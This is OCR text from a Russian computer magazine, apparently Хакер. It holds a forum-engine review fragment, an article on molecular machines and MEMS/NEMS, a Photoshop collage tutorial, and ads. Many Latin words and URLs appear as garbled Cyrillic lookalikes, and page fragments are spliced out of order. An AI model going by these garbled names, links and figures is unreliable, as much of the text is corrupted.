уверен в двух вещах. Первая: это очень функциональный и удобный продукт. И вторая: через полгода у тебя с 
форума уведут здоровую спам-базу, а с главной страницы неизвестный доброжелатель будет заливать троянов. 
Но мы с тобой совсем не из тех людей, которые будут бездумно ставить попсовый и бажный форум. Мы всегда в 
курсе, какие альтернативные решения существуют. Правда ведь? 






✓ 






‘V 





/ 



Дистрибутив форума представляет собой 
каркас, установив который, ты получаешь 
полноценную основу для форума. После 
инсталла можно сразу манипулировать раз- 
делами, постить мессаги и выполнять ряд 
других банальных вещей , но если требуется 
что-то большее, то необходимо наращивать 
функциональность. Работает тіпіВВ замет- 
но шустрее всех остальных. 



Конечного пользователя должны пора- 
довать быстрый интерфейс вкупе с де- 
компрессией, мощный поиск, список ак- 
тивных тем и даже подписка на темы через 
В83-фиды. Особенно хочу отметить еще и 
защиту от спама (ІІоосІ ргоіесііоп), обеща- 
ющую спасти от внезапного наплыва ботов. 
Такая фича не помешалабы нашему форуму 
( іогит.хакер.пА который страдает от подоб- 
ной напасти. 



Расширяется функциональность очень 
просто — с помощью подключаемых пла- 
гинов. А подключить можно буквально все: 
функции файлообменника, премодерации 
приватных сообщений, симпатичные смай- 
лики и аватары, фильтрацию мата, всевоз- 
можные статистики и ранговые системы 
пользователей и т.д. и т.п. Словом, все, что 
душе угодно. 



Архив со скриптом имеет скромный размер 
и быстро заливается с официального серве- 
ра. В качестве хранилища данных использу- 
ется популярная МуЗОІ_. Внешне форум име- 
ет очень строгий опрятный вид с минимумом 
графики. Если потребуется его украсить, то 
ты легко сможешь сделать это с помощью 
многочисленных модификаций ( ѵѵѵѵѵѵ.изеЬЬ. 
пеі/боѵѵпіоабз ). На этом же сайте доступны 
переводы, шаблоны внешнего вида и т.п. 






Шустрый и чрезвычайно расширяемый дви- 
жок. Посетители сайта наверняка скажут 
тебе спасибо за быструю работу и сэконом- 
ленный трафик, если в качестве скриптадля 
форума ты будешь использовать тіпіВВ. 
Первоначальный каркас можно дополнить 
по своему желанию, при этом быть уверен- 
ным за безопасность. Баги в тіпіВВ встре- 
чаются нечасто. 



В целом очень качественный и «свеже- 
нький» форум, который не стыдно уста- 
новить на свой сайт. Однако есть целый 
список, чего ему не хватает: приватных со- 
общений, пользовательских групп, голосо- 
ваний. Многое, конечно, можно исправить 
с помощью АСР-модулей, но полностью по- 
лагаться на них нельзя. Тем более что они 
разрабатываются третьими лицами. 
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ЖУРНАЛ «ХАКЕР» ПРЕДСТАВЛЯЕТ 
«НАСКЕР’З РІѲНТ СШВ»: 

БИТВЫ ВСЕХ ВРЕМЕН И НАРОДОВ. 
ТЕ, О КОМ ТЫ ЧИТАЛ, НО НИКОГДА 
НЕ ВИДЕЛ. ТЕ, КТО ЖИЛ И РАБОТАЛ 
ПО РАЗНЫЕ СТОРОНЫ БАРРИКАД, 
СХЛЕСТНУТСЯ НА ОДНОЙ АРЕНЕ... 
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ЮРИЙ СВИДИНЕНКО 

/ МЕТАМОКРН@ѴА№ЕХ.КІІ / 



Имплант / 01 

Молекулярные 




маши 



:1 

Галѳрѳя украинского микроминиатюриста 
Сядристого: НДр://ѵѵѵѵѵѵ.тісгоагШеѵ.иа 
Институт предвиденья с молекулярными 
моделями: Иі1р://ѵѵѵѵѵѵ.Іогѳ5ІаІі1.ога 
СНетОііісѳ 2006 Т гіаі 1 — аиикая прога, в ко- 
торой собирают молекулярные машины: 
ИПрУ/зсізЮге.сатЬгісІаезоІІсот/зоІІѵѵаге/ 
ргос!ис1.сіт?рісІ=401 3 



Под микроскопом — не только анализы 

Однажды мне под руку попалась книжка об украинском дядьке-ми- 
ниатюристе Николае Сядристом, который в 60-е годы прошлого 
века делал такие миниатюры, что не снились многим сегодняшним 
спецам с новейшим оборудованием. Посмотрев на его работы, я 
нашел не только электродвигатель размерами с муравья (это в 60-е 
годы-то!), но и другие интересные вещи: написание всяких слов на 
человеческом волосе, подковывание блох, изготовление шахмат- 
ной доски с такими мелкими фигурками шахмат, что их было плохо 
видно даже в микроскоп. Один экспонат неизменно повергает в 
изумление всех, кто его видит впервые: муляж розы, помещенный 
в высверленный (!) человеческий волос. 

Как рассказывал дедушка в своей книжке, до сих пор у него 
нет инструментов лучше, чем набор иголоки обычный оптический 
микроскоп, и что нужные инструменты он делал сам с помощью 
тех же иголок. И вот возникла у меня мысль: почему же тогда, уже 
с того времени не появилось видеокамер размером с ноготь, тех 
же мобилок или роботов размером с муху? Или почему не сделали 
разных имплантатов и не напихали их в свой организм?! Правда, 
тогда еще было неясно, зачем их пихать в организм. Но идеи о 
переделке тела уже витали в воздухе. Наверняка всяческие раз- 
ведки знали о достижениях дедушки, но никто не смогупотребить 
их себе во благо. 

Странно, ведь с таким заделом можно было бы шпионить за все- 
ми и каждым в отдельности. Но что-то не сложилось, и у дедушки 
осталась только выставка в Киеве возле Лавры. Интерес у ученых 
к разным микроподелкам возник сразу после изобретения про- 
стейшего оптического микроскопа. Про начало миниатюризации 



писал вевое время Лесковв «Левше». Но тогда подковка блох была 
делом трудным и кропотливым, а с появлением сканирующего тун- 
нельного микроскопа начался настоящий блошиный бум. Скани- 
рующий туннельный микроскоп представляет собой вакуумную 
камеру, в которой маленький щуп перемещается вдоль пластин- 
ки с образцом, причем образец должен обязательно проводить 
электричество. Между подложкой и щупом создают разность по- 
тенциалов, и через вакуум между ними протекает туннельный ток, 
значение которого измеряют, оцифровывают выводятнаэкран. В 
результате получается картинка микрорельефа, на которой можно 
видеть даже отдельные молекулы и атомы. 

Но работать с таким девайсом трудно из-за того, что не все на 
свете проводит электричество. Например, биологические объек- 
ты — ДНК, вирусы, бактерии, белки и пр. — его не проводят. Для 
этих случаев используют атомно-силовой микроскоп. 

Его щуп в буквальном смысле «ощупывает» поверхность, асвер- 
ху на него светят лазером и по значению отклонения луча состав- 
ляюттрехмерную картинку рельефа поверхности. Воттолько неза- 
дача: в микромире гораздо легче что-то подсмотреть, чем сделать. 
Поэтому изготовление и дальнейшее подковывание электронных 
блох — египетский труд. 

Вот и получается, что до появления фотолитографии, с помо- 
щью которой делают сегодня практически все микромеханизмы, 
у дедушки Сядристого не было и не могло быть конкурентов. Ведь 
кому нужна сверхминиатюрная камера или двигатель в единичном 
экземпляре, только одну деталь для которого делают года три? Ес- 
тественно, никому. 
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Запчасти из «атомного НЕГО» 

Любой девайс, кроме ложки, вилки и гири, состоит из запчастей. 
Это — аксиома. Так что даже самый простой электромеханичес- 
кий робот размерами с эритроцит должен содержать в себе уйму 
всяких деталек. Чтобы впихнуть в робота и мозги, и манипулято- 
ры, и даже простенькую систему навигации, нужно будет здорово 
постараться, а именно: при конструировании деталей надо сперва 
разработать атомный чертеж, по которому в будущем будут соби- 
рать отдельные части роботов, так как все его части сделаны с ато- 
марной точностью. 

Сейчас этой довольно хитрой наукой занимается целое направ- 
ление в молекулярной химии и нанотехнологии. Называется оно 
«математическое моделирование наноструктур и наносистем». 
Говоря проще, ученые рисуют в специальных прогах модели под- 
шипников, двигателей, манипуляторов, компьютеров, состоящие 
из отдельных атомов. А проги сами их проверяют на достовер- 
ность и рисуют модель того, что получилось, то есть показывают, 
как будет выглядеть та или иная деталь под атомно-силовым или 
электронным микроскопом. Труд этот очень нудный и долгий. Иные 
запчасти состоят из нескольких тысяч атомов, каждый из которых 
нужно «впихнуть» на полагающееся ему место. При этом нельзя 
забывать о таблице Менделеева: атомы могут соединяться друг 
с другом только в определенном количестве. Например, углерод 
в органике имеет валентность 4. Это означает, что к нему можно 
«присобачить» только 4 других атома одинарной химической ко- 
валентной связью. 

Конструирование даже самого простого подшипника — еще тот 
пазл. Даже если выстроить атомы так, как нам завещал великий 
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РагМоІ — прога для просмотра моделей в 
рсІЬ-формате + 

Набор молекулярных моделей 



/1/ молекулярный подшипник 
/2/ планетарный редуктор 




наноподшипника от обычного — то, что он состоит только из двух 
частей: внутренней и внешней. Так что красивых шариков, которы- 
ми мы стреляли в детстве из рогатки, ты там не увидишь — сила тре- 
ния атомных оболочек настолько мала, что он будет сам вращаться 
даже оттеплового движения молекул при комнатной температуре! 
Так вышло, что в «атомном ПЕГО» присутствует только несколько 
видов атомов-игроков, а не вся таблица Менделеева. Самые рас- 
пространенные из них: углерод, водород, кислород, сера, азот, 
фосфор и некоторые металлы. Ты можешь с помощью специаль- 
ной проги ВагМоІ посмотреть все эти модельки, повертеть их в ЗЭ и 
даже сделать свои, если закачаешь ТгіаІ-версию СИетОІІісе 2006. 
Вот еще один более сложный девайс: молекулярный насос, кото- 
рый качает только газообразный неон. Он устроен по типу мясо- 
рубки: ты можешь видеть внутренний ротор-шнек со специально 



сейчас этой довольно хитрои наукой занимается целое направле- 
ние В МОЛЕКУЛЯРНОЙ ХИМИИ И НАНОТЕХНОЛОГИИ 



Менделеев, то при проверке их прогой на достоверность может 
оказаться , что в реале деталь будет другой формы ! Т о есть делали 
мы круглый подшипник, а он вдруг начинает съеживаться и пре- 
вращаться в нечто бесформенное. Такие «волшебства» связаны с 
тем , что любая атомная структура принимает в пространстве такую 
форму, чтобы минимизировать свою поверхностную энергию. Вот 
и выходит: собирал целый день подшипник или простой стержень, 
а он возьми, да и развались. Но, несмотря на эти трудности, уже 
создан внушительный каталог разных молекулярных машин. На 
первый взгляд это занятие кажется бессмысленным: зачем рас- 
считывать такие структуры, когда их пока невозможно сделать? 
История развития таких исследований показала, что, когда появ- 
ляются нужные инструменты, много времени тратится на возню 
с прототипами. Поэтому разрабатывать принципиально рабочие 
схемы надо уже сегодня, чтобы через 10 лет не тратить время на 
всякие эксперименты, а сразу запустить руку в обширный каталог 
запчастей и сварганить, к примеру, нанокомпьютер или наноробо- 
та попроще. 

Вот, кпримеру, простая модель — обычный подшипник, который 
часто и густо используют в разных механизмах. Главное отличие 



выбранными расстояниями между спиралями, подходящими акку- 
рат к размеру молекулы неона. Выходит, куда бы ты ни поместил та- 
кой насос, он будет качать только молекулы определенного типа. 

Есть еще планетарные редукторы, которые даже невозможно 
представить как модели: число атомов может достигать несколь- 
ких тысяч. Но, без сомнения, самый крутой и нужный девайс в этих 
разработках — наноманипулятор, спроектированный по типу руки 
робота. Очень большой геморрой ожидаеттех, кто будет собирать 
первый рабочий девайс. Это надо будет делать практически вруч- 
ную, так как для того, чтобы сделать сборщика, нужен другой сбор- 
щик, а его еще не сделали :). 

Первые шаги — МЭМС 

Первые шаги по направлению внизуже сделаны. И называются они 
МЭМС, то есть микроэлектромеханические системы. Их произво- 
дят уже двадцать пять лет — с тех пор, как только достаточно раз- 
вилась технология фотолитографии, с помощью которой делают 
сегодня процессоры. Чтобы ты не думал, что блох подковывать — 
дело пустое и достойное всяких левшей-крэйзи, разъясню: рынок 
многофункциональных МЭМС-систем за прошлый год составил 
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68 миллиардов убитых енотов (по данным Ыеіѵѵогк оі ЕхсеІІепсе іп 
МиІШипсІіопаІ Місгозузіетз — ЫБХЕІЗ) и продолжает расти. Конеч- 
но, для того чтобы сделать что-то серьезное и получить прибыль, 
нужно попотеть (а где не нужно?). 

Первыми, кто что-то начал делать с МЭМС, были, естественно, 
военные. Можно сказать, что под их опекой МЭМС развиваются 
довольно быстро и широко применяются в военной технике. На- 
пример, все современные системы навигации работают благода- 
ря инерционным измерительным устройствам на МЭМС-основе. 
Система из трех гироскопов и трех МЭМС-акселерометров, свя- 
занная с ОРЗ, представляет собой навигационный блок. Также 
МЭМС-сенсоры используются в системе мониторинга и охраны 
заданной территории от вторжения при любых погодных условиях. 
Ранее разработанная система дистанционных сенсоров ІтргоѵесІ 
Петоіе ВаШеТіеІсІ Зепзог Зузіет (ІРЕМВАЗЗ) была дорогостоящей 
и крупногабаритной. Компания І_-3 Соттипісаііопз Іпс. разрабо- 
тала РЕМВАЗЗ II, которая использует МЭМС для сокращения раз- 
меров сенсоров. 

Знаменитый беспилотник ОІоЬаІ Наѵѵк работает именно на сис- 
теме с МЭМС-акселерометрами. Компания СгоззЬоѵѵ, специализи- 
рующаяся на разработке различных электронных устройств, про- 
дает систему навигации ІЧАѴ420, которая позволяет дистанционно 
управлять практически любой военной техникой. Ее уже использу- 
ют в управлении беспилотными самолетами ОІоЬаІ Наѵѵк, в новых 
машинахтипаНиттег,управляемыхдистанционно,атакже в опыт- 
ных образцах морских разведывательных судов. Особенно много 



хороших отзывов о работе навигатора в плохую погоду и шторм, 
когда пилоту трудно посадить самолет на авианосец. Встроенный 
ОРЗ выдаетточные координаты, скорость и высоту той машины, на 
которой установлен. Все это благодаря МЭМС-сенсорам, которые 
играют очень важную роль в системах навигации. 

Кромесенсоров, МЭМС — это, вболышинствесвоем, различные 
моторчики, переключатели, шестеренки и прочая дребедень. 

Компании, изготавливающие МЭМС, часто проделывают рек- 
ламные трюки. Вот подковывать блоху мы уже умеем. А слабо про- 
катить эту же блоху на карусели? Чтобы привлечь к себе внимание, 
крупнейшая компания по выпуску и разработке МЭМС , МЕМХ-ла- 
боратория, сварганила систему шестеренок с диском в центре. 
Вся эта механика довольно забавно крутилась, и тогда один из 
крэйзи предложил наловить на кладбище клещей и усадить их на 
диски, чтобы покатать. 

Сказано — сделано. В те годы (примерно 1 996 год) это достиже- 
ние было не только рекламным трюком, но и демонстрацией воз- 
можностей фирмы. Надо ли говорить, что после этого аттракциона 
у фирмы клиентов прибавилось? Но это было в далеких девянос- 
тых. Сегодня же вместо МЭМС широко используются НЭМС — на- 
ноэлектромеханические системы. Уже созданные быстродейс- 
твующие НЭМС-акселерометры будут использоваться в военной 
экипировке будущего поколения с целью детектировать удар пули 
о бронежилет настолько быстро, чтобы успел включиться внешний 
экзоскелет костюма. Военные машины предполагают оснастить 
специальной «электромеханической краской», которая позво- 
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Товар сертифицирован 




Используйте 
компьютеры ОШі 

и забудьте о проблемах! 





Компьютеры ОІсІі линии Ноте - 
идеальный вариант, сочетающий 
в себе все необходимое 
для работы и развлечений. 




Компьютеры ОІсІі линии МиШтебіа - 
оптимальное решение для тех, 
кто использует мультимедийные 
возможности на полную мощность. 




Компьютеры ОІсІі линии ОІіісе - 
готовое и экономичное решение, 
необходимое для эффективной 
работы любого офиса. 



Единая справочная: (495) 221 11 11 шѵѵ.оісіі.ги 



ул. Малышева 20 
Тел.(495) 105-0700 



ул. Трифоновская 45 
Тел. (495) 967-1433 



ул. Донская 32 
Тел. (495) 967-1555 
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/4/ катание блохи 

/5/ МЭМС — это в основном разные шестеренки 



лит им менять цвет наподобие хамелеона, а также предотвратит 
коррозию и сможет «затягивать» мелкие повреждения на корпусе 
машины. «Краска» будет состоять из большого количества нано- 
механизмов, которые будут выполнять все вышеперечисленные 
функции. А с помощью системы оптических матриц, которые бу- 
дут отдельными наномашинами в «краске», исследователи хотят 
добиться эффекта невидимости машины или самолета. Мини- 
атюрные камеры будут считывать изображение с одной стороны 
устройства, передавая его на фотоэлементы на другой стороне, 
формируя таким образом изображение заднего фона впереди ма- 
шины. Кульно, правда? Первые испытания прототипа уже прохо- 
дят! А внедрение его на поле боя — в 2009. 



Нанобагги 

Спускаться вниз по размерной лестнице очень трудно. В прошлом 
году ученые из университета Райса совершили прорыв в нано- 
механике. Они синтезировали наименьшую в мире движущуюся 
наномашину, которая ездит как настоящий автомобиль. Многие 
серьезные ученые и исследователи, знакомые с современным 
состоянием нанотехнологий и НЭМС, сначала в это не поверили, 
ведь до сих пор ученым не удавалось сделать что-то сложное. А 
тут — легковушка, состоящая из одной молекулы размером 4 на- 
нометра! Ведь 4 нанометра — это всего лишь отрезок, на котором 
можно поместить около 40 атомов водорода, и это чуть больше, чем 
толщина ДНК! Но это правда. Г лаваученых Джеймс М. Тур смог до- 
казать свое открытие — колесящие багги под дулом электронного 



микроскопа были выставлены на обозрение любому желающему. 

Автомобиль же — большая молекула-наносистема, состоящая 
из трехсот атомов. Она похожа на машину только наличием четы- 
рех «колес» и способом передвижения. В качестве колес легко- 
вушке служат фуллерены, молекулы С60, похожие на футбольный 
мяч, связанные химическими связями с «каркасом» машины. Син- 
тез и тестирование наномашины поможет значительно ускорить 
производство таких сложных структур, как нанофабрики или на- 
нороботы, методом сверху вниз. А это, в свою очередь, означает 
практическое внедрение микроскопических машин в твою жизнь. 

Вообще, искусственные объекты такого маленького масштаба, 
внешне напоминающие автомобили, уже были синтезированы хи- 
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4дате -Л От- ЙівГіМіЗІІ 




Игры детям не игрушки! 

Недетская площадь - 600 н г 
100 не по-детски мощных компьютеров 
Недетский Бар 




Москва, Ярославская уп„ ц. 12(м. ВДНХ) 
Тел.: (495) 6&646-Ф8 



1 




/6/ молекулярная модель легковушки 
/7/ легковушка в движении 



ч» ' 

М’% ■ - ч . *;•;*' ѵ . нА * І 

лШЛ'ііѴ ■ ,Ѵ 



миками. Но этот автомобиль — первый действующий: он катится 
по поверхности также, как автомобили. Исследователи придума- 
ли оригинальный метод приведения в движение наномашины: они 
нагрели ее до 200° С, что вызвало вращение фуллеренов-колес на 
химических связях, соединяющих их с «рамой» машины. От вра- 
щения четырех молекул легковушка пришла в движение и смогла 
катиться по плоской золотой поверхности. Чтобы убедиться в том, 
что машина действительно ездит, а не скользит, и ее передвижения 
связаны с вращением фуллеренов-колес, ученые засунули поли- 
гон с машинками под сканирующий туннельный микроскоп. Каж- 
дую минуту ученые получали с него снимки машин, доказывающие, 
что колеса действительно вращаются, и благодаря их вращению 
машина может ехать! 

Более того, наномашину можно подцепить зондом микроскопа, 
как краном, и перемещать с места на место. Естественно, что она 
легче входит в соединение с зондом, когда захват происходит по 
направлению движения машины (проверено учеными). 

Восемь лет группа ученых совершенствовала технику произ- 
водствананомашин, ивотнаконецихпопыткиувенчалисьуспехом. 
Удалось найти решение проблемы несовместимости палладиевых 
катализаторов, помогающих собирать «раму» машины с молеку- 
лами фуллеренов, которые тормозят синтез молекулы. Но методом 
проб и ошибок это затруднение все же было преодолено. 

Ученые уверены: машина сможет перевозить молекулярные 
грузы в различных направлениях, что найдет применение в на- 
ноконвейерах, нанофабриках и других сложных наносистемах. 
Также она может служить платформой для различных мобильных 
наносистем: нанороботов, наноманипуляторов. Представь себе: 
прикрепивнаеехребетнаноманипулятор, мы получаем мобильную 
сборочную станцию! 

В качестве энергетической подпитки исследователи хотят ис- 
пользовать дистанционные батарейки (направленные пучки фото- 
нов) вместо нагревания среды, в которой находятся машины. Так 
появится возможность дистанционно ими управлять и координиро- 
вать их перемещения с высокой степенью точности. 

Кошмары принца Чарльза 

Ну, конечно, багги — дело хорошее, однако что будет, если один ум- 
ный крендель приварит к машине с молекулярным манипулятором 
еще и слабенький компьютер, способный выполнять одну-единс- 
твенную программу: собирать из окружающих атомов такие же ма- 
шинки? А потом представь, что они расползутся и под благодатны- 
ми и полезными солнечными лучами будут клепать свои копии, пока 
все вокруг не превратится в автомонстров? «Ответим агрессорам 
первыми ! — сказал принц Чарльз. — Не дадим механическому от- 
родью разобрать нас на молекулы!» И теперь, по крайней мере в 
Объединенном Королевстве, гады не тронут местное население, 
ведь что может быть страшнее злого принца Чарльза? Местным 
ученым это очень не понравилось, и они втайне от принца стали 
подпольно варить механическое зелье, на которое потом не най- 
дешь управы. Вот такие они, сказки нового века. То ли еще будет. 
Оставайтесь с нами. 

ВІЫАПѴѴОІЖ’ЗПС 



МЭМС — «Многоножка» от ІВМ. 
«Многоножка» представляет собой 
«чистую» цифровую технологию. 
Принцип ее работы можно сравнить 
с работой старых проигрывателей 
грампластинок, в которых считыва- 
ющая вибрирующая игла скользила 
по борозде, несущей информацию, 
только у «Многоножки» есть ряд 
кантилеверов, скользящих по повер ^ 
хности хранения данных, на которой 
есть углубления, кодирующие 1 и 0 . 
Таким образом, отклонения канти- 
леверов от равновесного положения 
переводятся в набор 0 и 1 . 

Благодаря нанотехнологиям чип 
изготовлен по 10 -нанометрово- 
му техпроцессу, позволяющему 
размещать на органической плен- 
ке, которая выступает в качестве 
носителя информации, углубления 
диаметром 10 нанометров. Рассто- 
яние между углублениями состав- 
ляет 100 нанометров, что позво- 
лило разместить на чипе довольно 
большую матрицу атомно- силовых 
кантилеверов. Наличие углубления 
соответствует логической «1», а его 
отсутствие — логическому «0» . Кан- 
тилевер — это специальный атомно- 
силовой зонд, который «ощупывает» 
сканируемую поверхность, изменяя 
свое положение в пространстве в 
зависимости от того, встретит он на 
пути углубление или нет .При чтении 
данных специальный привод кремни- 
евого «стола», на котором размещена 
пленка с данными, перемещает ее в 
плоскости по заданным координа- 
там X и У. А привод мультиплексора 
позволяет управлять каждым кан- 
тилевером индивидуально, обеспе- 
чивая адресацию памяти. При этом 
матрица кантилеверов обеспечивает 
параллельное чтение/запись данных. 
«Многоножка» будет иметь емкость 
100 Гб при размерах обычных 8И- 
карт. Минимальная емкость «Много- 
ножки» составит 10 Гб. Как говорит 
ІВМ, эта переломная технология 
завоюет рынок к 2007 году. 
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ВЫСОКАЯ 

ПРОИЗВОДИТЕЛЬНОСТЬ 
И НАДЕЖНОСТЬ 



Компьютер ФРОНТ Т-90 (400) на базе двухъядерного процессора 
Іпіеі® Репііит® 0 обеспечивает высочайшую производительность 
для выполнения многозадачных приложений. 




Репііит □ 

іпзібё'' 




Обозначения ВиппуРеорІе, Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, логотип Сепігіпо, Сбірз, Соге Іпзісіе, Оіаіодіс, ЕІбегЕхргезз, ЕТОХ, РІазбРіІе, І386, І486, І960, ІСОМР, ІпзІапІІР, Іпіеі, логотип Іпіеі, Іп(еІ386, ІпІеІ486, ІпІеІ740, ІпІеЮХ2, ІпІеЮХ4, Іп(еІЗХ2, Іпіеі Соге, Іпіеі Іпзісіе, 
логотип Іпіеі Іпзісіе, Іпіеі. І_еар абеасі., логотип Іпіеі. І_еар аііеасі., Іпіеі ІЧеІВигзІ, Іпіеі ІЧеІМегде, Іпіеі ІМеІЗІгисІиге, Іпіеі ЗіпдІеОгіѵег, Іпіеі ЗреебЗІер, Іпіеі ЗІгаІаРІазб, Іпіеі Ѵііѵ, Іпіеі ХЗсаІе, ІРІ_іпк, Ііапіит, Ііапіит Іпзісіе, МСЗ, ММХ, логотип ММХ, логотип Оріітігег, 
ОѵеЮгіѵе, Рагадоп, РРСМагт, Репііит, Репііит II Хеоп, Репііит III Хеоп, Регіогтапсе аі Уоиг Соттапб, Репііит Іпзісіе, зкоооі, ЗоипсІ Магк, ТИе Сотриіег Іпзісіе., ТІге Зоигпеу Іпзісіе, ѴТипе, Хеоп и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными 
товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 







ДЖОРДЖ КЕЙРНС 



* Г утзон Борглум известен тем, что за 1 миллион долларов высек 
в скале Низіітоге фигуры президентов США. На дворе XXI век, 
и чем мы хуже? Воспользуемся данным руководством! 



Джордж Кейрнс имеет большой опыт работы с Рбоіозіюр. 

Его иллюстрации публиковались в многочисленных изданиях: 
от Ыеѵѵ Ѵогк Тітез до недавно вышедшей книги Рбоіозіпор Еіетепіз 
йгор ОеасІ Рбоіодгарбу Тесбпідиез. Он также предоставляет свои 
фотографии и иллюстрации для различных фотобанков. 
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ИЗМЕНЯЕМ ЛАНДШАФТ 

ЧЕЛОВЕКУ СВОЙСТВЕННА ИГРА ВООБРАЖЕНИЯ, И ОН НЕРЕДКО ВИДИТ КАКИЕ-ТО ОДУ- 
ШЕВЛЕННЫЕ ПРЕДМЕТЫ В ПРЕДМЕТАХ НЕОДУШЕВЛЕННЫХ. ОСОБЕННО ЧАСТО ЭТО 
ВСТРЕЧАЕТСЯ ПРИ ЛЮБОВАНИИ ПРИРОДНЫМИ ЯВЛЕНИЯМИ: ОБЛАКАМИ, ДЕРЕВЬЯМИ, 
ХОЛМАМИ... СЕЙЧАС, ПРИ ПОМОЩИ РНОТОЗНОР, СТАЛО ВОЗМОЖНЫМ ЭТИ НЕО- 
СЯЗАЕМЫЕ ОБРАЗЫ ВОПЛОТИТЬ В ЖИЗНЬ. В ПРОЦЕССЕ ПРОХОЖДЕНИЯ ЭТОГО УРО- 
КА МЫ УЗНАЕМ, КАК ИЗОБРАЗИТЬ НА ЗАСНЕЖЕННЫХ ГОРНЫХ ВЕРШИНАХ ЧЕЛОВЕ- 
ЧЕСКОЕ ЛИЦО. РАБОТАТЬ БУДЕМ ИНСТРУМЕНТОМ С/.ОМГ 8ТАМР КАК НАИБОЛЕЕ УДОБ- 
НЫМ ДЛЯ СОЗДАНИЯ ФОТОКОЛЛАЖА. ПОСЛЕ ТОГО КАК У НАС ВСЕ ПОЛУЧИТСЯ, МОЖ- 
НО ПОЭКСПЕРИМЕНТИРОВАТЬ С ДРУГИМИ ОБЪЕКТАМИ, ТАК ЧТО СОЗДАНИЕ ЛИЦА ИЗ 
ГОРНЫХ ВЕРШИН — ЭТО ТОЛЬКО НАЧАЛО. . . 




Откроем МоипІаіпВеІогеТіІ и РасеТіІ (их можно 
найти на нашем СО). При помощи инструмента 
Мадіс ѴѴапсІ выделим основную часть фона вокруг 
лица, а затем удалим ее. Для того чтобы удалить 
оставшиеся вокруг лица кусочки фона, не попав- 
шие в область выделения Мадіс ѴѴапсІ, воспользу- 
емся инструментом Егазег (Е). Сейчас нам не нуж- 
но вырезать лицо идеально, поскольку мы будем 
его использовать просто как шаблон при созда- 
нии вершины скалы. Перенесем вырезанное лицо 
в файл МоипІаіпВеЬгеТі^ — оно автоматически 
разместится в новом слое. 




Установим значение Орасііу слоя с лицом равное 
60%, таким образом мы будем видеть и лицо, 



и гору, которая находится под ним. Воспользу- 
емся инструментом ТгапзТогпп ( СігІ+Т) — нам 
нужно развернуть лицо на 90°, поскольку мы хо- 
тим, чтобы взгляд был направлен наверх, и нес- 
колько увеличить таким образом, чтобы нос 
слегка выступал над вершиной горы. При этом 
изображение несколько потеряет в качестве, но 
для нас это не принципиально, так как мы будем 
использовать только контур лица. Сотрем плечи, 
чтобы подбородок плавно переходил в гору. 




СОЗДАЕМ ВЫДЕЛЕНИЕ 



Кликнув на панели 1_ауегз правой кнопкой 
мыши на слое с лицом, выберем Зеіесі 
Тгапзрагепсу. После того как появилось 
выделение, скрываем слой с лицом и создаем 
новый пустой слой. Позднее мы перенесем 
сюда фрагменты гор, чтобы придать скале 
очертания человеческого лица. Кликнув 
внутри выделения правой кнопкой мыши, 
выбираем РеаШег, задав значение 2. Таким 
образом мы сделали края выделения мягче. 
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Выберем инструмент СІопе Зіатр (5) и в настрой- 
ках инструмента отметим галочкой Затріе АІідпесІ 
и АН іауегз, чтобы инструмент захватывал изобра- 
жение во всех слоях, а не только в активном, и 
брал образец цвета при каждом новом клике в но- 
вом месте. Удерживая АН, кликнем по той части 
изображения, которая находится прямо под вер- 
шиной, определив таким образом образец, кото- 
рым мы будем рисовать, и закрасим им в новом 
слое то место, где на портрете находится нос. 




МАЛЕНЬКАЯ ХИТРОСТЬ 



В процессе рисования не забываем отмечать 
новые области для взятия образцов. Попытаемся 
найти такие фрагменты скалы, которые приблизи- 
тельно повторяют очертания лица, после чего 
с помощью инструмента СІопе Зіатр перенесем 
их поверх фото с лицом. Поскольку мы не стали 
снимать выделения, то наши области не могут 
выйти за его край — выделение ограничивает 
зону действия СІопе Зіатр, сохраняя контур лица. 




Чтобы посмотреть, что получается (а выделение 
достаточно отвлекает), нажмем <СігІ>+<Н>. 

Это позволит нам сохранив выделение, скрыть с ра- 
боты его контур. Мы уже заполнили большую часть 
лица фрагментами скалы, но еще остались пустые 
области. Будем их заполнять — главное почаще ме- 
нять образцы скалы, чтобы пиксели не повторялись. 




ЧЕТКИЙ ПРОФИЛЬ 



ЧЕРНО-БЕЛЫЙ ПОТРЕТ 



Скопируем слой с лицом и расположим его над 
всеми остальными. Теперь выбираем Ітаде > 
Афзітепіз > Оезаіигаіе, чтобы сделать портрет 
черно-белым. Таким же образом обесцвечиваем 



После того как мы завершили заполнение 
выделений фрагментами скалы, пришла пора 
проработать с профилем. У нас до сих пор 
отсутствуют важные детали (рот, нос и глаз). 



Чтобы эти немаловажные элементы на лице и оригинал слоя, 
выглядели убедительно, создадим снеговые 
преграды на склонах — это позволит ввести в 
работу достаточное количество деталей, чтобы 
зритель увидел в нашей вершине лицо. 




Выберем инструмент Мадіс ѴѴапсІ на панели 
инструментов (или нажмем клавишу Щ 
и кликнем по черному участку обработанного 
слоя с лицом, после чего идем в меню Зеіесі > 
Зітііаг, чтобы добавить к выделению участки 
того же цвета. Нажимаем Оеіеіе или 
Васкзрасе, чтобы удалить выделенные 
области, оставив только белые участки. 



Сейчас будущий слой со снегом выглядит так, 
как будто он накрывает наши горы. Чтобы сде- 
лать изображение реалистичнее, необходимо до- 
бавить какую-нибудь подходящую текстуру. Вы- 
берем Зеіесі > Іпѵегзе, создадим новый слой, а 
затем снова воспользуемся инструментом СІопе 
Зіатр, чтобы перенести текстуру со светлых зас- 
неженных областей внутрь области выделения. 




Теперь выбираем Ітаде > Афзітепіз > Розіегііе, 
отметив значение 2 — таким образом мы ограничи- 
ли число цветов в этом слое, оставив только два: 
черный и белый. Мы собираемся использовать 
белые участки этого слоя при создании точных 
черт лица на снеговой границе. 




СОЗДАЕМ ПРОТАЛИНЫ 

Скрепим оба «снежных» слоя — лицо и только 
что созданный слой — скрепкой (в версии С32 
их можно просто выделить на панели Иауегз, 
кликнув по ним, удерживая Зііііі) и склеим. Соз- 
дадим для этого слоя іауег Мазк. Теперь воору- 
жимся инструментом ВгизН (В) и в библиотеке 
кистей выбирем какую-нибудь текстурную кисть. 
Будем ею закрашивать некоторые участки мас- 
ки, чтобы сквозь толщу снега иногда проступали 
детали скалы. 
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Для того чтобы лицо выглядело более реалистично, размоем маску фильтром 
Оаиззіап ВІиг с небольшими значениями. Он сделает границы мягче и поможет 
убрать излишние шероховатости, которые появились вследствие Розіегігаііоп. 



В конце нашей работы выделим слой со светлыми снежными 
